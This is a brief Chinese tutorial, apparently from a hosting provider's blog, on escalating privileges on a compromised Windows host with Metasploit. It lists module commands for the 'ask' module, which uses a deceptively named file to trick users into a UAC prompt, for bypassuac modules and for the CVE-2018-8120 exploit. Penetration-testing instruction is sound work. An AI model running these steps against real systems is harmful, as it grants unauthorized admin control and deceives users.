您好,登录后才能下订单哦!
本篇内容介绍了“内网渗透之如何理解msf本地提权”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!
前提与目标机建立会话连接
seach local/ask 搜索关键字local/ask
use 0 进入到exploit/windows/local/ask模块下
show options 查看相关参数
set FILENAME qqUPdate.exe 设置文件名qqUPdate.exe(具有迷惑性的名字都可以)
set session 1 设置会话窗口(先查看一下会话的id)
run执行
目标机弹出弹窗
点击是后,成功进入meterpreter命令行
这时候getsystem就可以成功提权
search bypassuac 搜索bypassuac关键字(显示有13个提取脚本,一个不行就换一个)
use 3 进入编号为3的提权脚本模块
show opthions 查看相关参数
查看会话并且设置会话
show targets 显示可选平台
set target 0 设置为X86
run 执行
提权成功
cve-2018-8120 Win32k权限提升漏洞],影响范围(Windows 7 SP1/2008 SP2,2008 R2 SP1)
search cve-2018-8120 查找关键字
use 0 进入该模块
show options 查看相关参数
session 查看会话
设置为没有权限的会话3
进入后直接获得管理员权限
“内网渗透之如何理解msf本地提权”的内容就介绍到这里了,感谢大家的阅读。如果想了解更多行业相关的知识可以关注亿速云网站,小编将为大家输出更多高质量的实用文章!
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。